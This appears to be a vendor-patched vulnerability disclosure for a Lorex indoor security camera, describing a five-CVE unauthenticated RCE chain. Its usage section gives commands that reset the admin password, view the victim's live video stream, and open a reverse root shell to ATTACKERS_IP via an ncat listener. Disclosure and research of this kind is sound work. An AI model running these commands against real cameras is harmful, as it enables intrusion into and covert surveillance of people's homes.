The Lorex 2K Indoor Wi-Fi Security Camera is a consumer security device that provides cloud-based video camera surveillance capabilities. This device was a target at the 2024 Pwn2Own IoT competition. Rapid7 developed an unauthenticated remote code execution (RCE) exploit chain as an entry for the competition. On November 25, 2024, Lorex released a firmware update to resolve the five vulnerabilities that comprise the exploit chain reported by Rapid7.
The exploit chain consists of five distinct vulnerabilities, which operate together in two phases to achieve unauthenticated RCE. The five vulnerabilities are listed below.
| CVE | Description | Affected Component | CVSSv3.1 |
|---|---|---|---|
| CVE-2024-52544 | An unauthenticated attacker can trigger a stack based buffer overflow. | DP Service (TCP port 3500) | 9.8 (Critical) |
| CVE-2024-52545 | An unauthenticated attacker can perform an out of bounds heap read. | IQ Service (TCP port 9876) | 6.5 (Medium) |
| CVE-2024-52546 | An unauthenticated attacker can perform a null pointer dereference. | DHIP Service (UDP port 37810) | 5.3 (Medium) |
| CVE-2024-52547 | An authenticated attacker can trigger a stack based buffer overflow. | DHIP Service (TCP port 80) | 7.2 (High) |
| CVE-2024-52548 | An attacker can bypass code signing enforcements and execute arbitrary native code. | Kernel | 6.7 (Medium) |
Phase 1 performs an authentication bypass, allowing a remote unauthenticated attacker to reset the device's admin password to a password of the attacker's choosing. This phase leverages an unauthenticated stack based buffer overflow, and an unauthenticated out-of-bounds (OOB) heap read vulnerability. The OOB heap read allows an attacker to leak secrets stored in the device’s memory that are required to compute a special code value; this code value is required for an administrator password reset to be performed. A null pointer dereference vulnerability is leveraged to force the device to reboot in order to allow the next phase to complete.
Phase 2 achieves remote code execution by leveraging the auth bypass in phase 1 to perform an authenticated stack based buffer overflow and execute an Operating System (OS) command with root privileges. This capability is then leveraged to write a file to disk and in turn, bypass the device's code signing enforcement in order to execute arbitrary native code. Finally, the exploit will execute a reverse shell payload to give the remote attacker a root shell on the target device.
A detailed technical analysis for this exploit chain can be found in Rapid7’s whitepaper here.
To discover a device on the network, the LOREX_DISCOVER.rb script can be used. No addition parameters are required, as discovery is performed over broadcast UDP.
ruby LOREX_DISCOVER.rbOnce the IP addres of a target device has been identified, the auth bypass can be performed via the LOREX_AUTHBYPASS.rb script.
ruby LOREX_AUTHBYPASS.rb -t TARGET_IP -p Rapid7!!After the auth bypass has succeeded, you can view the live video and audio stream of the target device by visiting the below URL in a suitable video player such as VLC.
rtsp://admin:Rapid7!!@TARGET_IP:554/cam/realmonitor?channel=1&subtype=0Finally, a reverse root shell can be achieved via the LOREX_RCE.rb script. An IP address and port for the reverse shell to call back to must be supplied.
ruby LOREX_RCE.rb -t TARGET_IP -p Rapid7!! --lhost ATTACKERS_IP --lport 4444Running an Ncat listner on the attackers machine will catch the reverse shell (Don't forget to open the listening port in your firewall rules).
ncat -lnvkp 4444
These vulnerabilities were discovered by Stephen Fewer, Principal Security Researcher at Rapid7 and were disclosed in accordance with Rapid7’s vulnerability disclosure policy.